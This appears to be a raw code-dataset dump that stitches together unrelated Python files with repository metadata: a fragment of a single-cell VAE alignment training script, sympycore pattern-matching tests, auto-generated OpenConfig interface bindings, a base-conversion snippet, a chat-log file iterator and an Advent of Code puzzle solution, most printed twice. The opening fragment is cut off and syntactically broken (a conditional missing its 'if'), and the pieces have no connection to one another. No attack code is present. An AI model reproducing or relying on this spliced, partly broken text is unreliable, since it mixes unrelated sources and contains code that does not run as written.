source, X_target = read_data(data_folder, data_subfolder)
gc.collect()
ell_line_scvi_params, tumor_scvi_params = read_scvi_params(output_folder)
sobolev_alignment_clf = SobolevAlignment(
source_scvi_params=cell_line_scvi_params,
target_scvi_params=tumor_scvi_params,
source_krr_params=default_krr_params,
target_krr_params=default_krr_params,
n_jobs=n_jobs
)
'sobolev_alignment_model' not in os.listdir(output_folder):
pass
else:
sys.exit("VAE ALREADY TRAINED")
sobolev_alignment_clf.n_jobs = n_jobs
sobolev_alignment_clf.fit(
X_source=X_source,
X_target=X_target,
source_batch_name=batch_name,
target_batch_name=batch_name,
continuous_covariate_names=continuous_covariate_names,
n_artificial_samples=100,
fit_vae=True,
sample_artificial=False,
krr_approx=False,
n_samples_per_sample_batch=10**6,
frac_save_artificial=1.,
save_mmap=tmp_file,
log_input=log_input,
no_posterior_collapse=no_posterior_collapse,
frob_norm_source=frob_norm_source
)
if 'sobolev_alignment_model' not in os.listdir(output_folder):
sobolev_alignment_clf.save('%s/sobolev_alignment_model/'%(output_folder), with_krr=False)
gc.collect()
for x in sobolev_alignment_clf.scvi_models:
np.savetxt(
'%s/scvi_embedding_%s.csv'%(output_folder, x),
sobolev_alignment_clf.scvi_models[x].get_latent_representation()
)
torch.cuda.empty_cache()
gc.collect()
sys.exit("FINISH VAE TRAINING")
| true
| true
|
790c7b5b9f22d1052daa93cf8ab7e00c67f239ff
| 5,297
|
py
|
Python
|
sympycore/basealgebra/tests/test_matches.py
|
radovankavicky/pymaclab
|
21da758f64ed0b62969c9289576f677e977cfd98
|
[
"Apache-2.0"
] | 96
|
2015-01-25T05:59:56.000Z
|
2021-12-29T14:05:22.000Z
|
sympycore/basealgebra/tests/test_matches.py
|
1zinnur9/pymaclab
|
21da758f64ed0b62969c9289576f677e977cfd98
|
[
"Apache-2.0"
] | 3
|
2015-12-17T19:25:46.000Z
|
2018-06-19T07:05:20.000Z
|
sympycore/basealgebra/tests/test_matches.py
|
1zinnur9/pymaclab
|
21da758f64ed0b62969c9289576f677e977cfd98
|
[
"Apache-2.0"
] | 36
|
2016-01-31T15:22:01.000Z
|
2021-03-29T07:03:07.000Z
|
from sympycore import CollectingField as Algebra
Symbol = Algebra.Symbol
Number = Algebra.Number
Add = Algebra.Add
Mul = Algebra.Mul
Pow = Algebra.Pow
Terms = Algebra.Terms
Factors = Algebra.Factors
def test_symbol():
p = Symbol('p')
s = Symbol('s')
t = Symbol('t')
assert s.matches(s)=={}
assert s.matches(t)==None
assert s.matches(t,{},([s,],[True,]))=={s:t}
assert s.matches(t,{},([s,t],[True,True]))==None
def test_number():
s = Symbol('s')
n = Number(2)
assert n.matches(2)=={}
assert n.matches(3)==None
assert n.matches(s)==None
assert n.matches(s+2)==None
def test_wild():
w = Symbol('w')
s = Symbol('s')
wargs = [w],[True]
assert w.matches(Number(2),{},wargs)=={w:2}
assert w.matches(s,{},wargs)=={w:s}
assert w.matches(w,{},wargs)==None
assert w.matches(s+2,{},wargs)=={w:s+2}
assert w.matches(2*s,{},wargs)=={w:2*s}
assert w.matches(s**2,{},wargs)=={w:s**2}
def test_symbol():
s = Symbol('s')
assert s.matches(s)=={}
assert s.matches(2)==None
assert s.matches(2+s)==None
assert s.matches(2*s)==None
assert s.matches(s**2)==None
def test_term():
s = Symbol('s')
p = 2*s
assert p.matches(2*s)=={}
assert p.matches(3*s)==None
assert p.matches(s)==None
assert p.matches(Number(2))==None
assert p.matches(s**2)==None
def _test_wild_term():
w = Symbol('w')
p = 2*w
s = Symbol('s')
t = Symbol('t')
wargs = {},([w],[True])
assert p.matches(Number(1),*wargs)=={w:Number(1)/2}
assert p.matches(Number(2),*wargs)=={w:1}
assert p.matches(2*s,*wargs)=={w:s}
assert p.matches(3*s,*wargs)=={w:s*Number(3)/2}
assert p.matches(t*s,*wargs)=={w:t*s/2}
assert p.matches(s**2,*wargs)=={w:s**2/2}
m = p.matches(2*s+2,*wargs)
assert m is not None and m[w]==(2*(s+1))/2
assert p.matches(2*s+4,*wargs)=={w:(s+2)*2/2}
assert p.matches(2*s+5,*wargs)=={w:(2*s+Number(5))/2}
assert p.matches(2*s+t,*wargs)=={w:(2*s+t)/2}
assert p.matches(2*s-2*t,*wargs)=={w:(s-t)*2/2}
def _test_wild_symbol_term():
w = Symbol('w')
s = Symbol('s')
t = Symbol('t')
p = s+w
wargs = {},([w],[True])
assert p.matches(s+2,*wargs)=={w:2}
assert p.matches(t+2,*wargs)=={w:t+2-s}
def _test_wild_wild_term():
w1 = Symbol('w1')
w2 = Symbol('w2')
p = w1 + 2*w2
s = Symbol('s')
t = Symbol('t')
wargs = {},([w1,w2],[True,True])
assert p.matches(Number(2),*wargs) in [{w2:0,w1:2},{w2:1,w1:0}]
assert p.matches(2*s+t+2,*wargs) in [{w2:1+s,w1:t},{w1:2*s+t,w2:1},{w2:s,w1:t+2},
{w1:2+2*s, w2:t/2}]
def _test_wild_factor():
w = Symbol('w')
p = w**2
s = Symbol('s')
t = Symbol('t')
wargs = {},([w],[True])
#assert p.matches(Number(2),*wargs)=={w:Number(2)**(Number(1)/2)}
#assert p.matches(Number(4),*wargs)=={w:2}
#assert p.matches(Number(16),*wargs)=={w:4}
#assert p.matches(Number(9),*wargs)=={w:3}
#assert p.matches(Number(8),*wargs)=={w:2*Number(2)**(Number(1)/2)}
assert p.matches(s,*wargs)==None
assert p.matches(s**2,*wargs)=={w:s}
assert p.matches(s**3,*wargs)==None
#assert p.matches(s**4,*wargs)=={w:s**2}
assert p.matches(s+2,*wargs)==None
assert p.matches(s*2,*wargs)==None
assert p.matches(s**2*2,*wargs)==None
#assert p.matches(s**2*4,*wargs)=={w:2*s}
#assert p.matches(s**2*t**2,*wargs)=={w:s*t}
#assert p.matches(4*s**2*t**2,*wargs)=={w:2*s*t}
#assert p.matches(s**4*t**4,*wargs)=={w:(s*t)**2}
#assert p.matches(s**2*t**4,*wargs)=={w:s*t**2}
assert p.matches(s**2*t**3,*wargs)==None
#assert p.matches(s**2*t**-4,*wargs)=={w:s*t**-2}
def _test_wild_symbol_factor():
w = Symbol('w')
s = Symbol('s')
t = Symbol('t')
p = s*w
wargs = {},([w],[True])
assert p.matches(Number(1),*wargs)=={w:1/s}
assert p.matches(s,*wargs)=={w:1}
assert p.matches(2+t,*wargs)=={w:(2+t)/s}
def test_symbol2():
x = Symbol('x')
a,b,c,p,q = map(Symbol, 'abcpq')
e = x
assert e.match(x) == {}
assert e.match(a,a) == {a: x}
e = Number(5)
assert e.match(c,c) == {c: 5}
assert e.match(e) == {}
assert e.match(e+1) == None
def _test_add():
x,y,a,b,c = map(Symbol, 'xyabc')
p,q,r = map(Symbol, 'pqr')
e = a+b
assert e.match(p+b,p) == {p: a}
assert e.match(p+a,p) == {p: b}
e = 1+b
assert e.match(p+b,p) == {p: 1}
e = a+b+c
assert e.match(a+p+c,p) == {p: b}
assert e.match(b+p+c,p) == {p: a}
e = a+b+c+x
assert e.match(a+p+x+c,p) == {p: b}
assert e.match(b+p+c+x,p) == {p: a}
assert e.match(b) == None
assert e.match(b+p,p) == {p: a+c+x}
assert e.match(a+p+c,p) == {p: b+x}
assert e.match(b+p+c,p) == {p: a+x}
e = 4*x+5
assert e.match(3*x+p,p) == {p: x+5}
assert e.match(4*x+p,(p,lambda expr: not expr.args)) == {p: 5}
assert e.match(p*x+5,(p,lambda expr: not expr.args)) == {p: 4}
assert e.match(p*x+q,(p,lambda expr: not expr.args),(q,lambda expr: not expr.args)) == {p: 4, q: 5}
e = 4*x+5*y+6
assert e.match(p*x+q*y+r,(p,lambda expr: not expr.args),
(q,lambda expr: not expr.args),
(r,lambda expr: not expr.args)) == {p: 4, q: 5, r: 6}
| 29.427778
| 103
| 0.537474
|
from sympycore import CollectingField as Algebra
Symbol = Algebra.Symbol
Number = Algebra.Number
Add = Algebra.Add
Mul = Algebra.Mul
Pow = Algebra.Pow
Terms = Algebra.Terms
Factors = Algebra.Factors
def test_symbol():
p = Symbol('p')
s = Symbol('s')
t = Symbol('t')
assert s.matches(s)=={}
assert s.matches(t)==None
assert s.matches(t,{},([s,],[True,]))=={s:t}
assert s.matches(t,{},([s,t],[True,True]))==None
def test_number():
s = Symbol('s')
n = Number(2)
assert n.matches(2)=={}
assert n.matches(3)==None
assert n.matches(s)==None
assert n.matches(s+2)==None
def test_wild():
w = Symbol('w')
s = Symbol('s')
wargs = [w],[True]
assert w.matches(Number(2),{},wargs)=={w:2}
assert w.matches(s,{},wargs)=={w:s}
assert w.matches(w,{},wargs)==None
assert w.matches(s+2,{},wargs)=={w:s+2}
assert w.matches(2*s,{},wargs)=={w:2*s}
assert w.matches(s**2,{},wargs)=={w:s**2}
def test_symbol():
s = Symbol('s')
assert s.matches(s)=={}
assert s.matches(2)==None
assert s.matches(2+s)==None
assert s.matches(2*s)==None
assert s.matches(s**2)==None
def test_term():
s = Symbol('s')
p = 2*s
assert p.matches(2*s)=={}
assert p.matches(3*s)==None
assert p.matches(s)==None
assert p.matches(Number(2))==None
assert p.matches(s**2)==None
def _test_wild_term():
w = Symbol('w')
p = 2*w
s = Symbol('s')
t = Symbol('t')
wargs = {},([w],[True])
assert p.matches(Number(1),*wargs)=={w:Number(1)/2}
assert p.matches(Number(2),*wargs)=={w:1}
assert p.matches(2*s,*wargs)=={w:s}
assert p.matches(3*s,*wargs)=={w:s*Number(3)/2}
assert p.matches(t*s,*wargs)=={w:t*s/2}
assert p.matches(s**2,*wargs)=={w:s**2/2}
m = p.matches(2*s+2,*wargs)
assert m is not None and m[w]==(2*(s+1))/2
assert p.matches(2*s+4,*wargs)=={w:(s+2)*2/2}
assert p.matches(2*s+5,*wargs)=={w:(2*s+Number(5))/2}
assert p.matches(2*s+t,*wargs)=={w:(2*s+t)/2}
assert p.matches(2*s-2*t,*wargs)=={w:(s-t)*2/2}
def _test_wild_symbol_term():
w = Symbol('w')
s = Symbol('s')
t = Symbol('t')
p = s+w
wargs = {},([w],[True])
assert p.matches(s+2,*wargs)=={w:2}
assert p.matches(t+2,*wargs)=={w:t+2-s}
def _test_wild_wild_term():
w1 = Symbol('w1')
w2 = Symbol('w2')
p = w1 + 2*w2
s = Symbol('s')
t = Symbol('t')
wargs = {},([w1,w2],[True,True])
assert p.matches(Number(2),*wargs) in [{w2:0,w1:2},{w2:1,w1:0}]
assert p.matches(2*s+t+2,*wargs) in [{w2:1+s,w1:t},{w1:2*s+t,w2:1},{w2:s,w1:t+2},
{w1:2+2*s, w2:t/2}]
def _test_wild_factor():
w = Symbol('w')
p = w**2
s = Symbol('s')
t = Symbol('t')
wargs = {},([w],[True])
assert p.matches(s,*wargs)==None
assert p.matches(s**2,*wargs)=={w:s}
assert p.matches(s**3,*wargs)==None
assert p.matches(s+2,*wargs)==None
assert p.matches(s*2,*wargs)==None
assert p.matches(s**2*2,*wargs)==None
assert p.matches(s**2*t**3,*wargs)==None
def _test_wild_symbol_factor():
w = Symbol('w')
s = Symbol('s')
t = Symbol('t')
p = s*w
wargs = {},([w],[True])
assert p.matches(Number(1),*wargs)=={w:1/s}
assert p.matches(s,*wargs)=={w:1}
assert p.matches(2+t,*wargs)=={w:(2+t)/s}
def test_symbol2():
x = Symbol('x')
a,b,c,p,q = map(Symbol, 'abcpq')
e = x
assert e.match(x) == {}
assert e.match(a,a) == {a: x}
e = Number(5)
assert e.match(c,c) == {c: 5}
assert e.match(e) == {}
assert e.match(e+1) == None
def _test_add():
x,y,a,b,c = map(Symbol, 'xyabc')
p,q,r = map(Symbol, 'pqr')
e = a+b
assert e.match(p+b,p) == {p: a}
assert e.match(p+a,p) == {p: b}
e = 1+b
assert e.match(p+b,p) == {p: 1}
e = a+b+c
assert e.match(a+p+c,p) == {p: b}
assert e.match(b+p+c,p) == {p: a}
e = a+b+c+x
assert e.match(a+p+x+c,p) == {p: b}
assert e.match(b+p+c+x,p) == {p: a}
assert e.match(b) == None
assert e.match(b+p,p) == {p: a+c+x}
assert e.match(a+p+c,p) == {p: b+x}
assert e.match(b+p+c,p) == {p: a+x}
e = 4*x+5
assert e.match(3*x+p,p) == {p: x+5}
assert e.match(4*x+p,(p,lambda expr: not expr.args)) == {p: 5}
assert e.match(p*x+5,(p,lambda expr: not expr.args)) == {p: 4}
assert e.match(p*x+q,(p,lambda expr: not expr.args),(q,lambda expr: not expr.args)) == {p: 4, q: 5}
e = 4*x+5*y+6
assert e.match(p*x+q*y+r,(p,lambda expr: not expr.args),
(q,lambda expr: not expr.args),
(r,lambda expr: not expr.args)) == {p: 4, q: 5, r: 6}
| true
| true
|
790c7d33ed5f2d9646494d9e9137958f6fb0bbd0
| 9,689
|
py
|
Python
|
napalm_yang/models/openconfig/interfaces/interface/subinterfaces/subinterface/ipv4/unnumbered/interface_ref/config/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 64
|
2016-10-20T15:47:18.000Z
|
2021-11-11T11:57:32.000Z
|
napalm_yang/models/openconfig/interfaces/interface/subinterfaces/subinterface/ipv4/unnumbered/interface_ref/config/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 126
|
2016-10-05T10:36:14.000Z
|
2019-05-15T08:43:23.000Z
|
napalm_yang/models/openconfig/interfaces/interface/subinterfaces/subinterface/ipv4/unnumbered/interface_ref/config/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 63
|
2016-11-07T15:23:08.000Z
|
2021-09-22T14:41:16.000Z
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-interfaces - based on the path /interfaces/interface/subinterfaces/subinterface/ipv4/unnumbered/interface-ref/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Configured reference to interface / subinterface
"""
__slots__ = ("_path_helper", "_extmethods", "__interface", "__subinterface")
_yang_name = "config"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__interface = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="interface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
self.__subinterface = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="subinterface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"interfaces",
"interface",
"subinterfaces",
"subinterface",
"ipv4",
"unnumbered",
"interface-ref",
"config",
]
def _get_interface(self):
"""
Getter method for interface, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv4/unnumbered/interface_ref/config/interface (leafref)
YANG Description: Reference to a base interface. If a reference to a
subinterface is required, this leaf must be specified
to indicate the base interface.
"""
return self.__interface
def _set_interface(self, v, load=False):
"""
Setter method for interface, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv4/unnumbered/interface_ref/config/interface (leafref)
If this variable is read-only (config: false) in the
source YANG file, then _set_interface is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_interface() directly.
YANG Description: Reference to a base interface. If a reference to a
subinterface is required, this leaf must be specified
to indicate the base interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="interface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """interface must be of a type compatible with leafref""",
"defined-type": "leafref",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/interfaces/ip', defining_module='openconfig-if-ip', yang_type='leafref', is_config=True)""",
}
)
self.__interface = t
if hasattr(self, "_set"):
self._set()
def _unset_interface(self):
self.__interface = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="interface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
def _get_subinterface(self):
"""
Getter method for subinterface, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv4/unnumbered/interface_ref/config/subinterface (leafref)
YANG Description: Reference to a subinterface -- this requires the base
interface to be specified using the interface leaf in
this container. If only a reference to a base interface
is requuired, this leaf should not be set.
"""
return self.__subinterface
def _set_subinterface(self, v, load=False):
"""
Setter method for subinterface, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv4/unnumbered/interface_ref/config/subinterface (leafref)
If this variable is read-only (config: false) in the
source YANG file, then _set_subinterface is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_subinterface() directly.
YANG Description: Reference to a subinterface -- this requires the base
interface to be specified using the interface leaf in
this container. If only a reference to a base interface
is requuired, this leaf should not be set.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="subinterface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """subinterface must be of a type compatible with leafref""",
"defined-type": "leafref",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="subinterface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/interfaces/ip', defining_module='openconfig-if-ip', yang_type='leafref', is_config=True)""",
}
)
self.__subinterface = t
if hasattr(self, "_set"):
self._set()
def _unset_subinterface(self):
self.__subinterface = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="subinterface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
interface = __builtin__.property(_get_interface, _set_interface)
subinterface = __builtin__.property(_get_subinterface, _set_subinterface)
_pyangbind_elements = OrderedDict(
[("interface", interface), ("subinterface", subinterface)]
)
| 38.756
| 338
| 0.618846
|
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class config(PybindBase):
__slots__ = ("_path_helper", "_extmethods", "__interface", "__subinterface")
_yang_name = "config"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__interface = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="interface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
self.__subinterface = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="subinterface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"interfaces",
"interface",
"subinterfaces",
"subinterface",
"ipv4",
"unnumbered",
"interface-ref",
"config",
]
def _get_interface(self):
return self.__interface
def _set_interface(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="interface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """interface must be of a type compatible with leafref""",
"defined-type": "leafref",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/interfaces/ip', defining_module='openconfig-if-ip', yang_type='leafref', is_config=True)""",
}
)
self.__interface = t
if hasattr(self, "_set"):
self._set()
def _unset_interface(self):
self.__interface = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="interface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
def _get_subinterface(self):
return self.__subinterface
def _set_subinterface(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="subinterface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """subinterface must be of a type compatible with leafref""",
"defined-type": "leafref",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="subinterface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/interfaces/ip', defining_module='openconfig-if-ip', yang_type='leafref', is_config=True)""",
}
)
self.__subinterface = t
if hasattr(self, "_set"):
self._set()
def _unset_subinterface(self):
self.__subinterface = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="subinterface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
interface = __builtin__.property(_get_interface, _set_interface)
subinterface = __builtin__.property(_get_subinterface, _set_subinterface)
_pyangbind_elements = OrderedDict(
[("interface", interface), ("subinterface", subinterface)]
)
| true
| true
|
790c7d52cffef7989eab03b3b36c8feaf7bb9e54
| 639
|
py
|
Python
|
changebase.py
|
quake0day/oj
|
c09333d1738f8735de0d5d825db6f4b707585670
|
[
"MIT"
] | null | null | null |
changebase.py
|
quake0day/oj
|
c09333d1738f8735de0d5d825db6f4b707585670
|
[
"MIT"
] | null | null | null |
changebase.py
|
quake0day/oj
|
c09333d1738f8735de0d5d825db6f4b707585670
|
[
"MIT"
] | null | null | null |
class Solution(object):
def changebase(self, n, base):
digits = "0123456789ABCDEF"
remstack = []
while n > 0:
rem = n % base
remstack.append(rem)
n = n / base
newString = ""
while not len(remstack) == 0:
newString += digits[remstack.pop()]
return newString
def countNum(self, n, base):
res = self.changebase(n, base)[:-1][::-1]
i = 0
count = 0
while i < len(res):
print int(res[i])
count += base**i * int(res[i])
i += 1
print count
a = Solution()
print a.changebase(44, 4)
print a.countNum(44, 4)
print a.changebase(23, 4)
| 21.3
| 46
| 0.544601
|
class Solution(object):
def changebase(self, n, base):
digits = "0123456789ABCDEF"
remstack = []
while n > 0:
rem = n % base
remstack.append(rem)
n = n / base
newString = ""
while not len(remstack) == 0:
newString += digits[remstack.pop()]
return newString
def countNum(self, n, base):
res = self.changebase(n, base)[:-1][::-1]
i = 0
count = 0
while i < len(res):
print int(res[i])
count += base**i * int(res[i])
i += 1
print count
a = Solution()
print a.changebase(44, 4)
print a.countNum(44, 4)
print a.changebase(23, 4)
| false
| true
|
790c7da827e14ff727534ea42036678e1841c3da
| 377
|
py
|
Python
|
chat_unifier/file_iterators/trillian_xml.py
|
mtlynch/chat_unifier
|
7449ca4f2dd48d8b76fc29e150643076dd0b3334
|
[
"MIT"
] | 2
|
2018-10-16T18:39:06.000Z
|
2019-01-22T01:38:09.000Z
|
chat_unifier/file_iterators/trillian_xml.py
|
mtlynch/chat_unifier
|
7449ca4f2dd48d8b76fc29e150643076dd0b3334
|
[
"MIT"
] | 2
|
2018-10-19T00:00:21.000Z
|
2018-10-19T17:15:25.000Z
|
chat_unifier/file_iterators/trillian_xml.py
|
mtlynch/chat_unifier
|
7449ca4f2dd48d8b76fc29e150643076dd0b3334
|
[
"MIT"
] | null | null | null |
import os
def iterate_files(directory):
for root, dirs, filenames in os.walk(directory):
for filename in filenames:
if _is_log_file(filename):
yield os.path.join(root, filename)
def _is_log_file(filename):
basename, extension = os.path.splitext(filename)
return ((extension == '.xml') and (not basename.endswith('-assets')))
| 26.928571
| 73
| 0.660477
|
import os
def iterate_files(directory):
for root, dirs, filenames in os.walk(directory):
for filename in filenames:
if _is_log_file(filename):
yield os.path.join(root, filename)
def _is_log_file(filename):
basename, extension = os.path.splitext(filename)
return ((extension == '.xml') and (not basename.endswith('-assets')))
| true
| true
|
790c7dc745912cc64eded0455518ab84c72d7f34
| 1,261
|
py
|
Python
|
2021/09-2.py
|
lsangers/AdventOfCode
|
5e4d1bb71c80609ef1472e5167922ed378ab06d6
|
[
"MIT"
] | 1
|
2021-12-03T10:35:45.000Z
|
2021-12-03T10:35:45.000Z
|
2021/09-2.py
|
lsangers/AdventOfCode
|
5e4d1bb71c80609ef1472e5167922ed378ab06d6
|
[
"MIT"
] | null | null | null |
2021/09-2.py
|
lsangers/AdventOfCode
|
5e4d1bb71c80609ef1472e5167922ed378ab06d6
|
[
"MIT"
] | null | null | null |
import os
import sys
filename = __file__[:-5] + '-input'
with open(filename) as f:
board = list(map(lambda s: list(map(int, list(s))), f.read().splitlines()))
max_row = len(board)
max_col = len(board[0])
def get_neighbors(row, col):
n = []
if(row > 0):
n.append((row-1,col))
if(row+1 < max_row):
n.append((row+1,col))
if(col > 0):
n.append((row,col-1))
if(col+1 < max_col):
n.append((row,col+1))
return n
low_points = []
basin_size = {}
for i, row in enumerate(board):
for j, val in enumerate(row):
neighbors = [board[r][c] for r,c in get_neighbors(i,j)]
if all([val < elem for elem in neighbors ]):
low_points.append((i,j))
for r,c in low_points:
visited = []
to_explore = [(r,c)]
while len(to_explore) > 0:
visited.append(to_explore[0])
cur_r, cur_c = to_explore.pop(0)
to_explore.extend([(r,c) for r,c in get_neighbors(cur_r, cur_c) if board[r][c] < 9 and (r,c) not in visited and (r,c) not in to_explore])
basin_size[(r,c)] = len(visited)
largest_basins = sorted(basin_size, key=basin_size.get, reverse=True)[:3]
print(basin_size[largest_basins[0]]*basin_size[largest_basins[1]]*basin_size[largest_basins[2]])
| 24.72549
| 145
| 0.610626
|
import os
import sys
filename = __file__[:-5] + '-input'
with open(filename) as f:
board = list(map(lambda s: list(map(int, list(s))), f.read().splitlines()))
max_row = len(board)
max_col = len(board[0])
def get_neighbors(row, col):
n = []
if(row > 0):
n.append((row-1,col))
if(row+1 < max_row):
n.append((row+1,col))
if(col > 0):
n.append((row,col-1))
if(col+1 < max_col):
n.append((row,col+1))
return n
low_points = []
basin_size = {}
for i, row in enumerate(board):
for j, val in enumerate(row):
neighbors = [board[r][c] for r,c in get_neighbors(i,j)]
if all([val < elem for elem in neighbors ]):
low_points.append((i,j))
for r,c in low_points:
visited = []
to_explore = [(r,c)]
while len(to_explore) > 0:
visited.append(to_explore[0])
cur_r, cur_c = to_explore.pop(0)
to_explore.extend([(r,c) for r,c in get_neighbors(cur_r, cur_c) if board[r][c] < 9 and (r,c) not in visited and (r,c) not in to_explore])
basin_size[(r,c)] = len(visited)
largest_basins = sorted(basin_size, key=basin_size.get, reverse=True)[:3]
